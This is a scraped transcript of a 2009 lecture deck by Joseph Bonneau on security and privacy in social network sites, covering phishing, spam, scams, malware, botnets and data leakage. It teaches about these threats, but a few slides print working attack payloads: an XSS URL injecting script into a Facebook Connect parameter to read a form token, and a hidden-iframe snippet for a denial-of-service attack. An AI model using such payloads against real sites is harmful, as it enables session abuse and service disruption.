Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security...
Transcript of Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security...
![Page 1: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/1.jpg)
Social Networks and Security
Checkpoint Sep 7, 2009
Joseph Bonneau, Computer Laboratory
![Page 2: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/2.jpg)
Hack #1: Photo URL Forging
Photo Exploits: PHP parameter fiddling (Ng, 2008)
![Page 3: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/3.jpg)
Hack #1: Photo URL Forging
Photo Exploits: Content Delivery Network URL fiddling
![Page 4: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/4.jpg)
Overview
I. The Social Network Ecosystem
II. Security
III.Privacy
![Page 5: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/5.jpg)
A Brief History
• SixDegrees.com, 1997
• Friendster, 2002
• MySpace, 2003
• Facebook, 2004
• Twitter, 2006
• Definitive account: danah boyd and Nicole Ellison “Social Network Sites: Definition, History, and Scholarship,” 2007
![Page 6: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/6.jpg)
Exponential Growth
![Page 7: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/7.jpg)
Facebook is Everywhere...
Freetown Christiania (Copenhagen, Denmark)
![Page 8: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/8.jpg)
Demographics
Still fairly dominated by youth
![Page 9: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/9.jpg)
Demographics
Rapid growth in older demographics
![Page 10: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/10.jpg)
Global Growth
![Page 11: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/11.jpg)
Global Players (11/2008)
Credit: oxyweb.co.uk
![Page 12: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/12.jpg)
Global Players (4/2009)
Credit: Vincenzo Cosenza
![Page 13: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/13.jpg)
American Control
![Page 14: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/14.jpg)
Why Worry About Social Networks?
Just LAMP websites where you list your friends...
![Page 15: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/15.jpg)
The Surprising Depth of Facebook
Facebook Stream
![Page 16: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/16.jpg)
The Surprising Depth of Facebook
Facebook Applications
![Page 17: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/17.jpg)
The Surprising Depth of Facebook
Facebook Connect
![Page 18: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/18.jpg)
Web 2.0?
Function Internet versionHTML, JavaScript FBML
DB Queries SQL FBQLEmail SMTP FB Mail
Forums Usenet, etc. FB GroupsInstant Messages XMPP FB Chat
News Streams RSS FB StreamAuthentication FB ConnectPhoto Sharing FB PhotosVideo Sharing FB Video
FB NotesTwitter, etc. FB Status Updates
FB PointsEvent Planning FB EventsClassified Ads FB Marketplace
Facebook versionPage Markup
OpenIDFlickr, etc.
YouTube, etc.Blogging Blogger, etc.
MicrobloggingMicropayment Peppercoin, etc.
E-Vitecraigslist
![Page 19: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/19.jpg)
From Al Gore to Mark Zuckerberg
Facebook has essentially re-invented the Internet
− Centralised
− Proprietary
− Walled
− Strong(er) identity
Killer addition is social context
![Page 20: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/20.jpg)
Parallel Trend: The Addition of Social Context
“Given sufficient funding, all web sites expand in functionality until users can add each other as friends”
![Page 21: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/21.jpg)
Facebook is the SNS that Matters
Dominant
− Largest and fastest-growing
− Most internationally successful
− Receives most media attention
Advanced
− Largest feature-set
− Most complex privacy model
− Closest representation of real-life social world
![Page 22: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/22.jpg)
Hack #2: Facebook XSS
http://www.facebook.com/connect/prompt_permissions.php?ext_perm=read_stream
Credit: theharmonyguy
![Page 23: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/23.jpg)
Hack #2: Facebook XSS
http://www.facebook.com/connect/prompt_permissions.php?ext_perm=1
Credit: theharmonyguy
![Page 24: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/24.jpg)
Hack #2: Facebook XSS
http://www.facebook.com/connect/prompt_permissions.php?ext_perm=%3Cscript%3Ealert(document.getElementById(%22post_form_id%22).value);%3C/script%3E
Credit: theharmonyguy
![Page 25: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/25.jpg)
Overview
I. The Social Network Ecosystem
II. Security
III.Privacy
![Page 26: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/26.jpg)
SNS Threat Model
![Page 27: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/27.jpg)
SNS Threat Model
Account compromise
− Email or SNS (practically the same)
Computer compromise
Monetary Fraud
− Increasingly becoming a payment platform
Service denial/mischief
![Page 28: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/28.jpg)
Web 2.0?
Function Internet versionHTML, JavaScript FBML
DB Queries SQL FBQLEmail SMTP FB Mail
Forums Usenet, etc. FB GroupsInstant Messages XMPP FB Chat
News Streams RSS FB StreamAuthentication FB ConnectPhoto Sharing FB PhotosVideo Sharing FB Video
FB NotesTwitter, etc. FB Status Updates
FB PointsEvent Planning FB EventsClassified Ads FB Marketplace
Facebook versionPage Markup
OpenIDFlickr, etc.
YouTube, etc.Blogging Blogger, etc.
MicrobloggingMicropayment Peppercoin, etc.
E-Vitecraigslist
![Page 29: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/29.jpg)
The Downside of Re-inventing the Internet
SNSs repeating all of the web's security problems− Phishing− Spam− 419 Scams & Fraud− Identity Theft/Impersonation− Malware− Cross-site Scripting− Click-Fraud− Stalking, Harassment, Bullying, Blackmail
![Page 30: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/30.jpg)
Differences in the SNS world
Each has advantages and disadvantages
− Centralisation
− Social Connections
− Personal Information
![Page 31: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/31.jpg)
Phishing
Genuine Facebook emails
![Page 32: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/32.jpg)
Phishing
Phishing attempt, April 30, 2009
![Page 33: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/33.jpg)
Phishing
Phishing attempt, April 30, 2009
![Page 34: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/34.jpg)
Phishing
Major Phishing attempts, April 29-30, 2009
− Simple “look at this” messages
− Users directed to www.fbstarter.com, www.fbaction.net
− Phished credentials used to automatically log in, send more mail
− Some users report passwords changed
Most “elaborate” scheme seen yet
Phishtank reports Facebook 7th most common target
− Behind only banks, PayPal, eBay
![Page 35: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/35.jpg)
Why SNSs are Vulnerable to Phishing
“Social Phishing” is far more effective
− 72% successful in controlled study (Jagatic et al.)
No TLS for login page
No anti-phishing measures
Frequent genuine emails with login-links
Users don't consider SNS password as valuable
Web 2.0 sites encourage password sharing...
![Page 36: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/36.jpg)
Password Sharing
![Page 37: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/37.jpg)
SNS Phishing Defense
Many advantages over email phishing prevention
− Real-time monitoring
− Can block, revoke messages
− Block outgoing links
Fast response to recent attacks
− Emails blocked, removed, sites down within 24 hours
![Page 38: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/38.jpg)
Spam
Major factor in the decline of MySpace, Friendster
Attractive target
− Can message any user in the system
− “Social Spam” much more effective than random spam
− Account creation is very cheap
![Page 39: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/39.jpg)
Spam
![Page 40: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/40.jpg)
Spam
Many advantages for SNS
− Global monitoring, blocking
− Automatically detect spammer profiles− Analyse link history− Analyse graph structure− Analyse profile
Aggressively request CAPTCHAs
Legal: Facebook won US $873 M award
![Page 41: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/41.jpg)
Spam
Tough question: Spam vs. Viral Promotion?
Facebook moving to two-classes of user:
− User profiles bound to represent “real people”
− Limits on friend count
− Limits on usernames
− Limits on messages
− “Pages” for celebrities, companies, bands, charities, etc.
− Most limits removed
− Subject to stricter control
![Page 42: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/42.jpg)
Malware
Koobface worm, launched August 2008
![Page 43: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/43.jpg)
Scams
Calvin: heyEvan: holy moly. what's up man?Calvin: i need your help urgentlyEvan: yes sirCalvin: am stuck here in londonEvan: stuck?Calvin: yes i came here for a vacationCalvin: on my process coming back home i was robbed inside the hotel i loged inEvan: ok so what do you needCalvin: can you loan me $900 to get a return ticket back home and pay my hotel billsEvan: how do you want me to loan it to you?Calvin: you can have the money send via western union
![Page 44: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/44.jpg)
Scams
Effective due to social context
− Skilled impersonators should be able to do much better
Not much can be done to prevent
− Education
Again, build detection system using social context, history
− Unexpected log-ins
− References to Western Union, etc.
![Page 45: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/45.jpg)
Malware
Koobface worm, launched August 2008
![Page 46: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/46.jpg)
Malware
Similar to Phishing
− Rapid spread via social context
− SNS can use social context to detect
− Also, warn users leaving site
![Page 47: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/47.jpg)
Malware Defense
![Page 48: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/48.jpg)
Botnet Command & Control
Twitterbot, August 2009
![Page 49: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/49.jpg)
Botnet Command & Control
Social channels identified in 2009 as optimal for C & C channel
− Particularly Skype, MSN messenger, also Twitter, Facebook
− Seen in the wild August 2009
Can be monitored by service operator, but no incentive
![Page 50: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/50.jpg)
SNS-hosted botnet
Idea: add malicious JavaScript payload to a popular application
Example: Denial of Service:
<iframe name="1" style="border: 0px none #ffffff;
width: 0px; height: 0px;"
src="http://victim-host/image1.jpg”
</iframe><br/>
“Facebot” - Elias Athanasopoulos, A. Makridakis, D. Antoniades S. Antonatos, Sotiris Ioannidis, K. G. Anagnostakis and Evangelos P. Markatos. “Antisocial Networks: Turning a Social Network into a Botnet,” 2008.
![Page 51: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/51.jpg)
Common Trends
Social channels increase susceptibility to scams
− Personal information also aids greatly in targeted attacks
Fundamental issue: SNS environment leads to carelessness
− Rapid, erratic browsing
− Applications installed with little scrutiny
− Fun, noisy, unpredictable environment
− People use SNS with their brain turned off
![Page 52: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/52.jpg)
Common Trends
• Centralisation helps in prevention
− Complete control of messaging platform, blocking, revocation
• Social Context also useful
− Can develop strong IDS
![Page 53: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/53.jpg)
Web Hacking
Most SNS have a poor security track record
− Rapid growth
− Complicated site design
− Many feature interactions
Lack of attention to security
− Over half of sites failing even to deploy TLS properly!
![Page 54: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/54.jpg)
FBML Translation
Facebook Markup Language
Result: arbitrary JavaScript execution (Felt, 2007)
Translated into HTML:
![Page 55: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/55.jpg)
Facebook Query Language
Facebook Query Language Exploits (Bonneau, Anderson, Danezis, 2009)
![Page 56: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/56.jpg)
Hack #3: Facebook XSRF/Automatic Authentication
Credit: Ronan Zilberman
![Page 57: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/57.jpg)
Overview
I. The Social Network Ecosystem
II. Security
III.Privacy
![Page 58: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/58.jpg)
Data of Interest
![Page 59: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/59.jpg)
Data of Interest
Profile Data
− Loads of PII (contact info, address, DOB)
− Tastes, preferences
Graph Data
− Friendship connections
− Common group membership
− Communication patterns
Activity Data
− Time, frequency of log-in, typical behavior
![Page 60: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/60.jpg)
Interested Parties
Data Aggregation
− Marketers, Insurers, Credit Ratings Agencies, Intelligence, etc.
− SNS operator implicitly included
− Often, graph information is more important than profiles
Targeted Data Leaks
− Employers, Universities, Fraudsters, Local Police, Friends, etc.
− Usually care about profile data and photos
![Page 61: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/61.jpg)
Major Privacy Problems
Data is shared in ways that most users don't expect
“Contextual integrity” not maintained
Three main drivers:
− Poor implementation
− Misaligned incentives & economic pressure
− Indirect information leakage
![Page 62: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/62.jpg)
Poor Implementation
![Page 63: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/63.jpg)
Poor Implementation
Orkut Photo Tagging
![Page 64: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/64.jpg)
Poor Implementation
Facebook Connect
![Page 65: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/65.jpg)
Poor Implementation
− Applications given full access to profile data of installed users− Even less revenue available for application developers...
![Page 66: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/66.jpg)
Poor Implementation
Better architectures proposed
− Privacy by proxy
− Privacy by sandboxing
![Page 67: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/67.jpg)
Economic Pressure
Most SNSs still lose money
− Advertising business model yet to prove its viability
Grow first, monetize later
− “Growth is primary, revenue is secondary” - Mark Zuckerberg
Privacy is often an impediment to new features
![Page 68: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/68.jpg)
Economic Pressure
Major survey of 45 social networks' privacy practices
Key Conclusions:
− “Market for privacy” fundamentally broken
− Huge network effects, lock-in, lemons market
− Sites with better privacy less likely to mention it!
![Page 69: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/69.jpg)
Promotional Techniques
![Page 70: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/70.jpg)
Promotional Techniques
![Page 71: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/71.jpg)
Terms of Service
Most Terms of Service reserve broad rights to user data
Terms of Service, hi5:
![Page 72: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/72.jpg)
Information leaked by the Social Graph...
![Page 73: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/73.jpg)
“Traditional” Social Network Analysis
• Performed by sociologists, anthropologists, etc. since the 70's
• Use data carefully collected through interviews & observation
• Typically < 100 nodes
• Complete knowledge
• Links have consistent meaning
• All of these assumptions fail badly for online social network data
![Page 74: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/74.jpg)
Traditional Graph Theory
• Nice Proofs
• Tons of definitions
• Ignored topics:
• Large graphs
• Sampling
• Uncertainty
![Page 75: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/75.jpg)
Models Of Complex Networks From Math & Physics
Many nice models
• Erdos-Renyi
• Watts-Strogatz
• Barabasi-Albert
Social Networks properties:
• Power-law
• Small-world
• High clustering coefficient
![Page 76: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/76.jpg)
Real social graphs are complicated!
